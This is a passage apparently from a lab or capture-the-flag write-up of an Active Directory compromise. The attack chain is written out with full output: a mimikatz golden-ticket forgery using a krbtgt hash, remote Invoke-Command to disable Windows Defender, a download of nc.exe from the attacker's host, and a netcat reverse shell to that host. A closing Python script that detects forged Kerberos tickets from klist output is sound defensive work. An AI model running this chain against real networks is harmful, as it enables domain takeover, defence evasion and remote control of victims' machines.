Using the golden ticket generated on 172.16.243.180, 192 can be accessed:

```text
c:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"
mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt
User      : Administrator
Domain    : final.com (FINAL)
SID       : S-1-5-21-1725955968-4040474791-670206374
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1725955968-4040474791-670206374-519 ;
ServiceKey: 405854caaf49b41e0e585369a001f114 - rc4_hmac_nt
Lifetime  : 8/4/2022 2:41:33 AM ; 8/1/2032 2:41:33 AM ; 8/1/2032 2:41:33 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ final.com' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
```

```text
c:\Users\Administrator\Desktop>more \\dc02.dev.final.com\c$\users\administrator\desktop\proof.txt
more \\dc02.dev.final.com\c$\users\administrator\desktop\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2
PS C:\Users\Administrator\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {whoami;ipconfig;hostname}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {whoami;ipconfig;hostname}
final\administrator

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.243.192
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254
dc02

PS C:\Users\Administrator\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose}
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.

PS C:\Users\Administrator\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {powershell.exe iwr -uri http://192.168.49.243/nc.exe -o c:\Users\Administrator\Desktop\nc.exe}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {powershell.exe iwr -uri http://192.168.49.243/nc.exe -o c:\Users\Administrator\Desktop\nc.exe}
PS C:\Users\Administrator\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {c:\Users\Administrator\Desktop\nc.exe 192.168.49.243 80 -e cmd.exe}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {c:\Users\Administrator\Desktop\nc.exe 192.168.49.243 80 -e cmd.exe}
```

```text
┌──(kali㉿kali)-[/usr/share/windows-binaries]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 63152
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.FINAL\Documents>hostname
hostname
dc02

C:\Users\Administrator.FINAL\Documents>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.243.192
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254

C:\Users\Administrator.FINAL\Documents>whoami
whoami
final\administrator

C:\Users\Administrator.FINAL\Documents>

C:\Users\Administrator.FINAL\Documents>more c:\Users\Administrator\Desktop\proof.txt
more c:\Users\Administrator\Desktop\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2

C:\Users\Administrator.FINAL\Documents>
```
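From the defender's side, the injected ticket above leaves host-level traces a responder can check: a TGT whose lifetime (8/4/2022 to 8/1/2032, ten years) far exceeds the domain's maximum ticket lifetime, an RC4-encrypted TGT, and a ticket that no KDC ever issued. The following Python script is an added example, not part of the original writeup; it parses `klist` output and flags cached TGTs showing these indicators. The `klist` text is constructed and its field layout is assumed from the Windows `klist` format.

```python
import re
from datetime import datetime, timedelta

# Constructed `klist` output (assumed layout, not captured from the page): ticket #0
# mirrors the injected golden TGT above, ticket #1 is a normally issued TGT.
SAMPLE_KLIST = """\
#0>     Client: Administrator @ FINAL.COM
        Server: krbtgt/FINAL.COM @ FINAL.COM
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 8/4/2022 2:41:33 (local)
        End Time:   8/1/2032 2:41:33 (local)
        Kdc Called:
#1>     Client: jdoe @ FINAL.COM
        Server: krbtgt/FINAL.COM @ FINAL.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 8/4/2022 8:00:00 (local)
        End Time:   8/4/2022 18:00:00 (local)
        Kdc Called: DC01.final.com
"""
MAX_TGT_LIFE = timedelta(hours=10)   # default "Maximum lifetime for user ticket" policy
TIME_FMT = "%m/%d/%Y %H:%M:%S"

def parse_klist(text):
    """Split klist output into one {field: value} dict per cached ticket."""
    tickets, cur = [], None
    for line in text.splitlines():
        if re.match(r"#\d+>", line):          # "#N>" starts a new ticket entry
            cur = {}
            tickets.append(cur)
            line = re.sub(r"^#\d+>", "", line)
        if cur is not None and ":" in line:
            key, value = line.split(":", 1)
            cur[key.strip()] = value.replace("(local)", "").strip()
    return tickets

def golden_ticket_indicators(t):
    """Reasons a cached TGT looks forged; an empty list means nothing suspicious."""
    reasons = []
    if not t.get("Server", "").startswith("krbtgt/"):
        return reasons                         # service tickets are out of scope here
    start = datetime.strptime(t["Start Time"], TIME_FMT)
    end = datetime.strptime(t["End Time"], TIME_FMT)
    if end - start > MAX_TGT_LIFE:
        reasons.append(f"lifetime {end - start} exceeds policy maximum {MAX_TGT_LIFE}")
    if "RC4" in t.get("KerbTicket Encryption Type", ""):
        reasons.append("RC4-encrypted TGT where AES is expected")
    if not t.get("Kdc Called"):
        reasons.append("no KDC contacted: ticket was injected, not issued")
    return reasons
```

Run `golden_ticket_indicators` over `parse_klist(SAMPLE_KLIST)`: the Administrator TGT returns all three indicators, the jdoe TGT returns none.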